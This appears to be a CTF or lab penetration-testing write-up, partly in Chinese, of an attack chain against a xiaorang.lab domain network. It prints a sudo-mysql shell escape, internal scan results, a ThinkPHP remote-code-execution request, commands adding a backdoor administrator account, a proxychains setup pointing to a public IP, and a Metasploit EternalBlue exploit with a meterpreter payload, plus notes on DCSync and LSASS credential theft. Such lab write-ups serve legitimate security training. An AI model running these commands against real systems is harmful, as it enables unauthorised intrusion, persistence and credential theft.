(www-data:/var/www/html) $ sudo -l Matching Defaults entries for www-data on ubuntu-web01: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ubuntu-web01: (root) NOPASSWD: /usr/bin/mysql
sudo mysql -e '\! /bin/sh'
sudo mysql -e '\! find / -name flag*'
sudo mysql -e '\! tac /root/flag/flag01.txt' flag01: flag{60b53231-
(icmp) Target 172.22.1.2 is alive (icmp) Target 172.22.1.15 is alive (icmp) Target 172.22.1.21 is alive (icmp) Target 172.22.1.18 is alive [*] Icmp alive hosts len is: 4 172.22.1.18:80 open 172.22.1.2:88 open 172.22.1.15:22 open 172.22.1.15:80 open 172.22.1.2:135 open 172.22.1.21:445 open 172.22.1.21:135 open 172.22.1.21:139 open 172.22.1.2:445 open 172.22.1.18:135 open 172.22.1.18:3306 open 172.22.1.18:445 open 172.22.1.18:139 open 172.22.1.2:139 open 172.22.1.15:10010 open [*] alive ports len is: 15 start vulscan [*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin [*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login [*] NetInfo [*]172.22.1.2 [->]DC01 [->]172.22.1.2 [*] NetInfo [*]172.22.1.18 [->]XIAORANG-OA01 [->]172.22.1.18 [*] NetInfo [*]172.22.1.21 [->]XIAORANG-WIN7 [->]172.22.1.21 [+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1) [*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393) [*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统 [*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600 [*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393 [+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
r = session.get(url3) r = session.get(url_pre + filepath + "?a=system('dir');") print(r.text)
成功getshell,得到flag2,权限足够,新建一个用户登录上去
1 2
net user test1 baozongwi123! /add net localgroup administrators test1 /add
并不是域用户,接着去打永恒之蓝,先在kali弄好socks代理
1 2 3
sudo vim /etc/proxychains4.conf
socks5 156.238.233.93 5555
flag3
利用msf攻击
1 2 3 4 5 6 7 8 9
proxychains4 msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.1.21 exploit shell chcp 65001
Individually, this edge does not grant the ability to perform an attack. However, in conjunction with DS-Replication-Get-Changes, a principal may perform a DCSync attack.
Individually, this edge does not grant the ability to perform an attack. However, in conjunction with DS-Replication-Get-Changes-All, a principal may perform a DCSync attack.
When a user authenticates to a computer, they often leave credentials exposed on the system, which can be retrieved through LSASS injection, token manipulation/theft, or injecting into a user’s process. 当用户向计算机进行身份验证时,他们通常会在系统上公开凭据,这些凭据可以通过 LSASS 注入、令牌作/盗窃或注入用户进程来检索。